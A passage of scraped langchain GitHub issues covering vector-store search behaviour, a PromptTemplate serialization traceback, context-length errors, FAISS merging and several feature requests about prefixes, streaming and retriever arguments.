('werkzeug', '2.3.6'), ('wheel', '0.40.0'), ('yarl', '1.9.2'), ('zipp', '3.16.0')]
### Who can help?
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
target_query = 'What are the hyve rules?'
facts_docs = [
Document(page_content=f)
for f in [x.strip() for x in """
Under the banner of privacy, hyve empowers you to determine the visibility of your goals, providing you with options like Public (all hyve members can see your goal), Friends (only your trusted hyve connections can), and Private (for secret missions where you can personally invite the desired ones)
At hyve, we're all about protecting your details and your privacy, making sure everything stays safe and secure
The main goal of hyve is to provide you with the tools to reach your financial goals as quickly as possible, our motto is: "Get there faster!"
Resting as the sole financial community composed entirely of 100% verified real users, hyve assures that each user is genuine and verified, enhancing the safety of you and our community
Designed with privacy as a top priority, hyve puts the power in your hands to control exactly who you share your goals with
hyve prioritizes your personal data protection and privacy rights, using your data exclusively to expedite the achievement of your goals without sharing your information with any other parties, for more info please visit https://app.letshyve.com/privacy-policy
Being the master of your privacy and investment strategies, you have full control over your goal visibility, making hyve a perfect partner for your financial journey
The Round-Up Rule in hyve integrates savings into your daily habits by rounding up your everyday expenses, depositing the surplus into your savings goal, e.g. if you purchase a cup of coffee for $2.25, hyve rounds it up to $3, directing the $0.75 difference to your savings
The Automatic Rule in hyve enables our AI engine to analyze your income and spending habits, thereby determining how much you can safely save, so you don't have to worry about it
The Recurring Rule in hyve streamlines your savings by automatically transferring a specified amount to your savings on a set schedule, making saving as effortless as possible
The Matching Rule in hyve allows you to double your savings by having another user match every dollar you save towards a goal, creating a savings buddy experience
""".strip().split('\n')]
]
retriever = FAISS.from_documents(facts_docs, OpenAIEmbeddings())
docs = '\n'.join(d.page_content for d in retriever.similarity_search(target_query, k=10))
print(docs)
for a in ['Round-Up', 'Automatic', 'Recurring', 'Matching']:
assert a in docs, f'{a} not in docs'
```
### Expected behavior
The words that contain most information above are `hyve` and `rule`, it should return the lines which define the `Round-Up Rule in hyve`, `Automatic Rule in hyve`, `Recurring Rule in hyve`, `Matching Rule in hyve`.
instead, the best 2 result it finds are:
> At hyve, we're all about protecting your details and your privacy, making sure everything stays safe and secure
and
> Under the banner of privacy, hyve empowers you to determine the visibility of your goals, providing you with options like Public (all hyve members can see your goal), Friends (only your trusted hyve connections can), and Private (for secret missions where you can personally invite the desired ones)
which don't even have the word `rule` in them or have anything to do with rules.
The full list of results are:
```
At hyve, we're all about protecting your details and your privacy, making sure everything stays safe and secure
Under the banner of privacy, hyve empowers you to determine the visibility of your goals, providing you with options like Public (all hyve members can see your goal), Friends (only your trusted hyve connections can), and Private (for secret missions where you can personally invite the desired ones)
The Automatic Rule in hyve enables our AI engine to analyze your income and spending habits, thereby determining how much you can safely save, so you don't have to worry about it
Designed with privacy as a top priority, hyve puts the power in your hands to control exactly who you share your goals with
The main goal of hyve is to provide you with the tools to reach your financial goals as quickly as possible, our motto is: "Get there faster!"
Resting as the sole financial community composed entirely of 100% verified real users, hyve assures that each user is genuine and verified, enhancing the safety of you and our community
hyve prioritizes your personal data protection and privacy rights, using your data exclusively to expedite the achievement of your goals without sharing your information with any other parties, for more info please visit https://app.letshyve.com/privacy-policy
The Recurring Rule in hyve streamlines your savings by automatically transferring a specified amount to your savings on a set schedule, making saving as effortless as possible
The Matching Rule in hyve allows you to double your savings by having another user match every dollar you save towards a goal, creating a savings buddy experience
Being the master of your privacy and investment strategies, you have full control over your goal visibility, making hyve a perfect partner for your financial journey
```
which don't even include the `Round-Up Rule in hyve` line in the top 10.
I've tried every open source VectorStore I could find (FAISS, Chrome, Annoy, DocArray, Qdrant, scikit-learn, etc), they all returned the exact same list.
I also tried making everything lowercase (it did help with other queries, here it didn't).
I also tried with relevancy score (getting 10x as many and sorting myself), which did help in other cases, but not here.
Any suggestion is welcome, especially if the error is on my side.
Thanks! | Similarity search returns random docs, not the ones that contain the specified keywords | https://api.github.com/repos/langchain-ai/langchain/issues/7427/comments | 9 | 2023-07-09T12:31:36Z | 2023-10-14T20:41:00Z | https://github.com/langchain-ai/langchain/issues/7427 | 1,795,381,432 | 7,427 |
[
"langchain-ai",
"langchain"
] | ### System Info
---------------------------------------------------------------------------
TypeError Traceback (most recent call last)
Cell In[15], line 15
12 qa = RetrievalQA(combine_documents_chain=qa_chain, retriever=retriever.as_retriever())
14 query = "halo"
---> 15 qa.run(query)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:440, in Chain.run(self, callbacks, tags, metadata, *args, **kwargs)
438 if len(args) != 1:
439 raise ValueError("`run` supports only one positional argument.")
--> 440 return self(args[0], callbacks=callbacks, tags=tags, metadata=metadata)[
441 _output_key
442 ]
444 if kwargs and not args:
445 return self(kwargs, callbacks=callbacks, tags=tags, metadata=metadata)[
446 _output_key
447 ]
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:243, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, metadata, include_run_info)
241 except (KeyboardInterrupt, Exception) as e:
242 run_manager.on_chain_error(e)
--> 243 raise e
244 run_manager.on_chain_end(outputs)
245 final_outputs: Dict[str, Any] = self.prep_outputs(
246 inputs, outputs, return_only_outputs
247 )
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:237, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, metadata, include_run_info)
231 run_manager = callback_manager.on_chain_start(
232 dumpd(self),
233 inputs,
234 )
235 try:
236 outputs = (
--> 237 self._call(inputs, run_manager=run_manager)
238 if new_arg_supported
239 else self._call(inputs)
240 )
241 except (KeyboardInterrupt, Exception) as e:
242 run_manager.on_chain_error(e)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/retrieval_qa/base.py:131, in BaseRetrievalQA._call(self, inputs, run_manager)
129 else:
130 docs = self._get_docs(question) # type: ignore[call-arg]
--> 131 answer = self.combine_documents_chain.run(
132 input_documents=docs, question=question, callbacks=_run_manager.get_child()
133 )
135 if self.return_source_documents:
136 return {self.output_key: answer, "source_documents": docs}
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:445, in Chain.run(self, callbacks, tags, metadata, *args, **kwargs)
440 return self(args[0], callbacks=callbacks, tags=tags, metadata=metadata)[
441 _output_key
442 ]
444 if kwargs and not args:
--> 445 return self(kwargs, callbacks=callbacks, tags=tags, metadata=metadata)[
446 _output_key
447 ]
449 if not kwargs and not args:
450 raise ValueError(
451 "`run` supported with either positional arguments or keyword arguments,"
452 " but none were provided."
453 )
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:243, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, metadata, include_run_info)
241 except (KeyboardInterrupt, Exception) as e:
242 run_manager.on_chain_error(e)
--> 243 raise e
244 run_manager.on_chain_end(outputs)
245 final_outputs: Dict[str, Any] = self.prep_outputs(
246 inputs, outputs, return_only_outputs
247 )
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:237, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, metadata, include_run_info)
231 run_manager = callback_manager.on_chain_start(
232 dumpd(self),
233 inputs,
234 )
235 try:
236 outputs = (
--> 237 self._call(inputs, run_manager=run_manager)
238 if new_arg_supported
239 else self._call(inputs)
240 )
241 except (KeyboardInterrupt, Exception) as e:
242 run_manager.on_chain_error(e)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/combine_documents/base.py:106, in BaseCombineDocumentsChain._call(self, inputs, run_manager)
104 # Other keys are assumed to be needed for LLM prediction
105 other_keys = {k: v for k, v in inputs.items() if k != self.input_key}
--> 106 output, extra_return_dict = self.combine_docs(
107 docs, callbacks=_run_manager.get_child(), **other_keys
108 )
109 extra_return_dict[self.output_key] = output
110 return extra_return_dict
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/combine_documents/stuff.py:165, in StuffDocumentsChain.combine_docs(self, docs, callbacks, **kwargs)
163 inputs = self._get_inputs(docs, **kwargs)
164 # Call predict on the LLM.
--> 165 return self.llm_chain.predict(callbacks=callbacks, **inputs), {}
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/llm.py:252, in LLMChain.predict(self, callbacks, **kwargs)
237 def predict(self, callbacks: Callbacks = None, **kwargs: Any) -> str:
238 """Format prompt with kwargs and pass to LLM.
239
240 Args:
(...)
250 completion = llm.predict(adjective="funny")
251 """
--> 252 return self(kwargs, callbacks=callbacks)[self.output_key]
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:243, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, metadata, include_run_info)
241 except (KeyboardInterrupt, Exception) as e:
242 run_manager.on_chain_error(e)
--> 243 raise e
244 run_manager.on_chain_end(outputs)
245 final_outputs: Dict[str, Any] = self.prep_outputs(
246 inputs, outputs, return_only_outputs
247 )
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:237, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, metadata, include_run_info)
231 run_manager = callback_manager.on_chain_start(
232 dumpd(self),
233 inputs,
234 )
235 try:
236 outputs = (
--> 237 self._call(inputs, run_manager=run_manager)
238 if new_arg_supported
239 else self._call(inputs)
240 )
241 except (KeyboardInterrupt, Exception) as e:
242 run_manager.on_chain_error(e)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/llm.py:92, in LLMChain._call(self, inputs, run_manager)
87 def _call(
88 self,
89 inputs: Dict[str, Any],
90 run_manager: Optional[CallbackManagerForChainRun] = None,
91 ) -> Dict[str, str]:
---> 92 response = self.generate([inputs], run_manager=run_manager)
93 return self.create_outputs(response)[0]
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/llm.py:102, in LLMChain.generate(self, input_list, run_manager)
100 """Generate LLM result from inputs."""
101 prompts, stop = self.prep_prompts(input_list, run_manager=run_manager)
--> 102 return self.llm.generate_prompt(
103 prompts,
104 stop,
105 callbacks=run_manager.get_child() if run_manager else None,
106 **self.llm_kwargs,
107 )
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/base.py:230, in BaseChatModel.generate_prompt(self, prompts, stop, callbacks, **kwargs)
222 def generate_prompt(
223 self,
224 prompts: List[PromptValue],
(...)
227 **kwargs: Any,
228 ) -> LLMResult:
229 prompt_messages = [p.to_messages() for p in prompts]
--> 230 return self.generate(prompt_messages, stop=stop, callbacks=callbacks, **kwargs)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/base.py:125, in BaseChatModel.generate(self, messages, stop, callbacks, tags, metadata, **kwargs)
123 if run_managers:
124 run_managers[i].on_llm_error(e)
--> 125 raise e
126 flattened_outputs = [
127 LLMResult(generations=[res.generations], llm_output=res.llm_output)
128 for res in results
129 ]
130 llm_output = self._combine_llm_outputs([res.llm_output for res in results])
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/base.py:115, in BaseChatModel.generate(self, messages, stop, callbacks, tags, metadata, **kwargs)
112 for i, m in enumerate(messages):
113 try:
114 results.append(
--> 115 self._generate_with_cache(
116 m,
117 stop=stop,
118 run_manager=run_managers[i] if run_managers else None,
119 **kwargs,
120 )
121 )
122 except (KeyboardInterrupt, Exception) as e:
123 if run_managers:
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/base.py:262, in BaseChatModel._generate_with_cache(self, messages, stop, run_manager, **kwargs)
258 raise ValueError(
259 "Asked to cache, but no cache found at `langchain.cache`."
260 )
261 if new_arg_supported:
--> 262 return self._generate(
263 messages, stop=stop, run_manager=run_manager, **kwargs
264 )
265 else:
266 return self._generate(messages, stop=stop, **kwargs)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/openai.py:371, in ChatOpenAI._generate(self, messages, stop, run_manager, **kwargs)
363 message = _convert_dict_to_message(
364 {
365 "content": inner_completion,
(...)
368 }
369 )
370 return ChatResult(generations=[ChatGeneration(message=message)])
--> 371 response = self.completion_with_retry(messages=message_dicts, **params)
372 return self._create_chat_result(response)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/openai.py:319, in ChatOpenAI.completion_with_retry(self, **kwargs)
315 @retry_decorator
316 def _completion_with_retry(**kwargs: Any) -> Any:
317 return self.client.create(**kwargs)
--> 319 return _completion_with_retry(**kwargs)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/tenacity/__init__.py:289, in BaseRetrying.wraps.<locals>.wrapped_f(*args, **kw)
287 @functools.wraps(f)
288 def wrapped_f(*args: t.Any, **kw: t.Any) -> t.Any:
--> 289 return self(f, *args, **kw)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/tenacity/__init__.py:379, in Retrying.__call__(self, fn, *args, **kwargs)
377 retry_state = RetryCallState(retry_object=self, fn=fn, args=args, kwargs=kwargs)
378 while True:
--> 379 do = self.iter(retry_state=retry_state)
380 if isinstance(do, DoAttempt):
381 try:
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/tenacity/__init__.py:314, in BaseRetrying.iter(self, retry_state)
312 is_explicit_retry = fut.failed and isinstance(fut.exception(), TryAgain)
313 if not (is_explicit_retry or self.retry(retry_state)):
--> 314 return fut.result()
316 if self.after is not None:
317 self.after(retry_state)
File /Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/concurrent/futures/_base.py:438, in Future.result(self, timeout)
436 raise CancelledError()
437 elif self._state == FINISHED:
--> 438 return self.__get_result()
440 self._condition.wait(timeout)
442 if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
File /Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/concurrent/futures/_base.py:390, in Future.__get_result(self)
388 if self._exception:
389 try:
--> 390 raise self._exception
391 finally:
392 # Break a reference cycle with the exception in self._exception
393 self = None
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/tenacity/__init__.py:382, in Retrying.__call__(self, fn, *args, **kwargs)
380 if isinstance(do, DoAttempt):
381 try:
--> 382 result = fn(*args, **kwargs)
383 except BaseException: # noqa: B902
384 retry_state.set_exception(sys.exc_info()) # type: ignore[arg-type]
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/openai.py:317, in ChatOpenAI.completion_with_retry.<locals>._completion_with_retry(**kwargs)
315 @retry_decorator
316 def _completion_with_retry(**kwargs: Any) -> Any:
--> 317 return self.client.create(**kwargs)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/openai/api_resources/chat_completion.py:25, in ChatCompletion.create(cls, *args, **kwargs)
23 while True:
24 try:
---> 25 return super().create(*args, **kwargs)
26 except TryAgain as e:
27 if timeout is not None and time.time() > start + timeout:
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/openai/api_resources/abstract/engine_api_resource.py:153, in EngineAPIResource.create(cls, api_key, api_base, api_type, request_id, api_version, organization, **params)
127 @classmethod
128 def create(
129 cls,
(...)
136 **params,
137 ):
138 (
139 deployment_id,
140 engine,
(...)
150 api_key, api_base, api_type, api_version, organization, **params
151 )
--> 153 response, _, api_key = requestor.request(
154 "post",
155 url,
156 params=params,
157 headers=headers,
158 stream=stream,
159 request_id=request_id,
160 request_timeout=request_timeout,
161 )
163 if stream:
164 # must be an iterator
165 assert not isinstance(response, OpenAIResponse)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/openai/api_requestor.py:288, in APIRequestor.request(self, method, url, params, headers, files, stream, request_id, request_timeout)
277 def request(
278 self,
279 method,
(...)
286 request_timeout: Optional[Union[float, Tuple[float, float]]] = None,
287 ) -> Tuple[Union[OpenAIResponse, Iterator[OpenAIResponse]], bool, str]:
--> 288 result = self.request_raw(
289 method.lower(),
290 url,
291 params=params,
292 supplied_headers=headers,
293 files=files,
294 stream=stream,
295 request_id=request_id,
296 request_timeout=request_timeout,
297 )
298 resp, got_stream = self._interpret_response(result, stream)
299 return resp, got_stream, self.api_key
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/openai/api_requestor.py:581, in APIRequestor.request_raw(self, method, url, params, supplied_headers, files, stream, request_id, request_timeout)
569 def request_raw(
570 self,
571 method,
(...)
579 request_timeout: Optional[Union[float, Tuple[float, float]]] = None,
580 ) -> requests.Response:
--> 581 abs_url, headers, data = self._prepare_request_raw(
582 url, supplied_headers, method, params, files, request_id
583 )
585 if not hasattr(_thread_context, "session"):
586 _thread_context.session = _make_session()
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/openai/api_requestor.py:553, in APIRequestor._prepare_request_raw(self, url, supplied_headers, method, params, files, request_id)
551 data = params
552 if params and not files:
--> 553 data = json.dumps(params).encode()
554 headers["Content-Type"] = "application/json"
555 else:
File /Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/json/__init__.py:231, in dumps(obj, skipkeys, ensure_ascii, check_circular, allow_nan, cls, indent, separators, default, sort_keys, **kw)
226 # cached encoder
227 if (not skipkeys and ensure_ascii and
228 check_circular and allow_nan and
229 cls is None and indent is None and separators is None and
230 default is None and not sort_keys and not kw):
--> 231 return _default_encoder.encode(obj)
232 if cls is None:
233 cls = JSONEncoder
File /Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/json/encoder.py:199, in JSONEncoder.encode(self, o)
195 return encode_basestring(o)
196 # This doesn't pass the iterator directly to ''.join() because the
197 # exceptions aren't as detailed. The list call should be roughly
198 # equivalent to the PySequence_Fast that ''.join() would do.
--> 199 chunks = self.iterencode(o, _one_shot=True)
200 if not isinstance(chunks, (list, tuple)):
201 chunks = list(chunks)
File /Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/json/encoder.py:257, in JSONEncoder.iterencode(self, o, _one_shot)
252 else:
253 _iterencode = _make_iterencode(
254 markers, self.default, _encoder, self.indent, floatstr,
255 self.key_separator, self.item_separator, self.sort_keys,
256 self.skipkeys, _one_shot)
--> 257 return _iterencode(o, 0)
File /Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/json/encoder.py:179, in JSONEncoder.default(self, o)
160 def default(self, o):
161 """Implement this method in a subclass such that it returns
162 a serializable object for ``o``, or calls the base implementation
163 (to raise a ``TypeError``).
(...)
177
178 """
--> 179 raise TypeError(f'Object of type {o.__class__.__name__} '
180 f'is not JSON serializable')
TypeError: Object of type PromptTemplate is not JSON serializable
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
from langchain.prompts import PromptTemplate
prompt_template = """Use the following pieces of context to answer the question at the end. If you don't know the answer, just say that you don't know, don't try to make up an answer.
Question: {question}
Answer in Italian:"""
PROMPT = PromptTemplate(
template=prompt_template, input_variables=["question"]
)
chain_type_kwargs = {"prompt": PROMPT}
llm = ChatOpenAI(model_name = "gpt-3.5-turbo",temperature=0,model_kwargs=chain_type_kwargs)
qa_chain = load_qa_chain(llm=llm, chain_type="stuff",verbose=True)
qa = RetrievalQA(combine_documents_chain=qa_chain, retriever=retriever.as_retriever())
query = "halo"
qa.run(query)
### Expected behavior
Hope to use the PromptTemplate in QA | TypeError: Object of type PromptTemplate is not JSON serializable | https://api.github.com/repos/langchain-ai/langchain/issues/7426/comments | 2 | 2023-07-09T10:02:36Z | 2023-10-15T16:04:53Z | https://github.com/langchain-ai/langchain/issues/7426 | 1,795,324,312 | 7,426 |
[
"langchain-ai",
"langchain"
] | ### Feature request
We are using langchain for non-English applications. The prefix for system is hardcoded as "System":
```python
for m in messages:
if isinstance(m, HumanMessage):
role = human_prefix
elif isinstance(m, AIMessage):
role = ai_prefix
elif isinstance(m, SystemMessage):
role = "System"
elif isinstance(m, FunctionMessage):
role = "Function"
elif isinstance(m, ChatMessage):
role = m.role
else:
raise ValueError(f"Got unsupported message type: {m}")
```
The word "System" will appear in the prompt, e.g., when using summary-based memories. A sudden English word is not friendly to non-English LLMs.
### Motivation
Improving multi-language support.
### Your contribution
Sorry. I am probably not capable enough of developing langchain. | Can you make system_prefix customizable? | https://api.github.com/repos/langchain-ai/langchain/issues/7415/comments | 1 | 2023-07-08T22:26:17Z | 2023-10-14T20:09:47Z | https://github.com/langchain-ai/langchain/issues/7415 | 1,795,149,831 | 7,415 |
[
"langchain-ai",
"langchain"
] | ### Feature request
Pipe `intermediate_steps` out of MR chain:
```
# Combining documents by mapping a chain over them, then combining results
combine_documents = MapReduceDocumentsChain(
# Map chain
llm_chain=map_llm_chain,
# Reduce chain
reduce_documents_chain=reduce_documents_chain,
# The variable name in the llm_chain to put the documents in
document_variable_name="questions",
# Return the results of the map steps in the output
return_intermediate_steps=True)
# Define Map=Reduce
map_reduce = MapReduceChain(
# Chain to combine documents
combine_documents_chain=combine_documents,
# Splitter to use for initial split
text_splitter=text_splitter)
return map_reduce.run(input_text=input_doc)
```
Error:
```
ValueError: `run` not supported when there is not exactly one output key. Got ['output_text', 'intermediate_steps'].
```
### Motivation
We want to return the intermediate docs
### Your contribution
Will work on this | Pipe `intermediate_steps` out of map_reduce.run() | https://api.github.com/repos/langchain-ai/langchain/issues/7412/comments | 4 | 2023-07-08T19:14:30Z | 2024-02-09T16:25:54Z | https://github.com/langchain-ai/langchain/issues/7412 | 1,795,070,373 | 7,412 |
[
"langchain-ai",
"langchain"
] | ### System Info
Hey! Below is the code i'm using
```
llm_name = "gpt-3.5-turbo"
# llm_name = "gpt-4"
os.environ["OPENAI_API_KEY"] = ""
st.set_page_config(layout="wide")
def load_db(file_path, chain_type, k):
loader = PyPDFLoader(file_path)
documents = loader.load()
text_splitter = RecursiveCharacterTextSplitter(chunk_size=2000, chunk_overlap=300)
docs = text_splitter.split_documents(documents)
embeddings = OpenAIEmbeddings()
db = DocArrayInMemorySearch.from_documents(docs, embeddings)
retriever = db.as_retriever(search_type="similarity", search_kwargs={"k": k})
qa = ConversationalRetrievalChain.from_llm(
llm=ChatOpenAI(model_name=llm_name, temperature=1),
chain_type=chain_type,
retriever=retriever,
return_source_documents=False,
return_generated_question=False
)
return qa
```
Even though i'm using RecursiveCharacterTextSplitter function, it is returning below error.
`InvalidRequestError: This model's maximum context length is 4097 tokens. However, your messages resulted in 5822 tokens. Please reduce the length of the messages.`
Is there anything which will fix this issue?
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
-
### Expected behavior
I'm using RecursiveCharacterTextSplitter function where it'll make use of the function and will exceed the context length. It should work right? | InvalidRequestError: This model's maximum context length is 4097 tokens. However, your messages resulted in 5822 tokens. Please reduce the length of the messages. | https://api.github.com/repos/langchain-ai/langchain/issues/7411/comments | 3 | 2023-07-08T19:08:53Z | 2023-11-15T16:07:44Z | https://github.com/langchain-ai/langchain/issues/7411 | 1,795,068,803 | 7,411 |
[
"langchain-ai",
"langchain"
] | ### Feature request
I'm trying to create a Q&A application, where i'm using Vicuna and it's taking lot of time to return the response. Below is the code
```
from langchain.embeddings.openai import OpenAIEmbeddings
from langchain.text_splitter import RecursiveCharacterTextSplitter
from langchain.vectorstores import DocArrayInMemorySearch
from langchain.chains import ConversationalRetrievalChain
from langchain.chat_models import ChatOpenAI
from langchain.document_loaders import PyPDFLoader
from langchain.embeddings import HuggingFaceEmbeddings
import llama_cpp
from run_localGPT import load_model
def load_db(file, chain_type, k):
# load documents
loader = PyPDFLoader(file)
documents = loader.load()
# split documents
text_splitter = RecursiveCharacterTextSplitter(chunk_size=1000, chunk_overlap=150)
docs = text_splitter.split_documents(documents)
# define embedding
embeddings = HuggingFaceEmbeddings()
# create vector database from data
db = DocArrayInMemorySearch.from_documents(docs, embeddings)
# define retriever
retriever = db.as_retriever(search_type="similarity", search_kwargs={"k": k})
# create a chatbot chain. Memory is managed externally.
qa = ConversationalRetrievalChain.from_llm(
llm=load_model(model_id="TheBloke/Wizard-Vicuna-13B-Uncensored-GGML", device_type="mps", model_basename="Wizard-Vicuna-13B-Uncensored.ggmlv3.q2_K.bin"),#ChatOpenAI(model_name=llm_name, temperature=0),
chain_type=chain_type,
retriever=retriever,
return_source_documents=True,
return_generated_question=True,
)
return qa
```
I'm using Vicuna-13b model and hugging face embeddings. What i thought is that it'd be much better if i use hugging face embeddings and any benchmark q&a model, so that the return time will be less. Is there any to load normal models like distilbert, roberta or distilbert-base-uncased-distilled-squad etc?
### Motivation
To utilize the benchmark models for better response time.
### Your contribution
- | Adding function to utilize normal models like distilbert, roberta etc | https://api.github.com/repos/langchain-ai/langchain/issues/7406/comments | 1 | 2023-07-08T16:21:18Z | 2023-10-14T20:09:52Z | https://github.com/langchain-ai/langchain/issues/7406 | 1,795,005,669 | 7,406 |
[
"langchain-ai",
"langchain"
] | Hi: I'm trying to merge a list of `langchain.vectorstores.FAISS` objects to create a new (merged) vectorstore, but I still need the original (pre-merge) vectorstores intact. I can use `x.merge_from(y)` which works great:
`merged_stores = reduce(lambda x, y: (z := x).merge_from(y) or z, stores)
`
but that modifies x in place, so my original list of vectorstores ends up with its first store containing a merge with all other elements of the list: which is not what I want. So I tried using `deepcopy()` to make a temporary copy of the vectorstore I'm merging into:
`merged_stores = reduce(lambda x, y: (z := deepcopy(x)).merge_from(y) or z, stores)
`
which does exactly what I want. However, I now find that when I use a Universal Sentence Encoder embedding in the original list of vectorstores I get an exception from `deepcopy()`:
`TypeError: cannot pickle '_thread.RLock' object`
Is there an obvious way for me to achieve this (non-destructive) merge without adding my own `FAISS.merge_from_as_copy()` method to the `langchain.vectorstores.FAISS` class?
| Trying to merge a list of FAISS vectorstores without modifying the original vectorstores, but deepcopy() fails | https://api.github.com/repos/langchain-ai/langchain/issues/7402/comments | 5 | 2023-07-08T14:05:34Z | 2023-10-21T16:07:25Z | https://github.com/langchain-ai/langchain/issues/7402 | 1,794,954,384 | 7,402 |
[
"langchain-ai",
"langchain"
] | ### Feature request
Add the `name` and `arguments` from `function_call` to `on_llm_new_token` when `streaming=True`.
Now it's getting called with an empty token several times and no way to retrieve the `function_call['arguments']`.
We need to add this to every llm/
### Motivation
I'm streaming my calls (user get's to see the output realtime) to an llm and I've decided to use function calls so I get a structured output. I want to show the user the results (one argument is `message`) but I cannot cause only the tokens from `content` are streamed.
Using the plain openai api I can do this.
### Your contribution
I can contribute a PR to a model and some tests, but I need guidance, as what the API should be. As I understand only `chat_models.openai` should be modified. | Add the `name` and `arguments` from `function_call` to `on_llm_new_token` when `streaming=True` | https://api.github.com/repos/langchain-ai/langchain/issues/7385/comments | 6 | 2023-07-07T23:14:25Z | 2023-09-25T09:45:57Z | https://github.com/langchain-ai/langchain/issues/7385 | 1,794,522,874 | 7,385 |
[
"langchain-ai",
"langchain"
] | ### System Info
> langchain==0.0.227
> langchainplus-sdk==0.0.20
> chromadb==0.3.26
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I'm sorry, but I don't have the time to carve out a MRE right now. My take is that it's still better to report it than not to.
### Expected behavior
`similarity_search_with_score` returns the distance as expected, but `similarity_search_with_relevance_scores` gives the same values, so that the closest distances return the smallest values, even though the output of the latter function is supposed to be higher for vectors that are closer:
> `similarity_search_with_relevance_scores`
> Return docs and relevance scores in the range [0, 1].
> 0 is dissimilar, 1 is most similar. | ChromaDB score goes the wrong way | https://api.github.com/repos/langchain-ai/langchain/issues/7384/comments | 6 | 2023-07-07T23:11:04Z | 2024-02-09T16:25:58Z | https://github.com/langchain-ai/langchain/issues/7384 | 1,794,520,863 | 7,384 |
[
"langchain-ai",
"langchain"
] | ### Feature request
I want to pass arguments to the retriever used in the `VectorStoreIndexWrapper` `query` and `query_with_sources` methods. Right now, those methods don't have any means of passing `VectorStoreRetriever` arguments into `vectorstore.as_retriever()`:
```
langchain/indexes/vectorstore.py
def query(
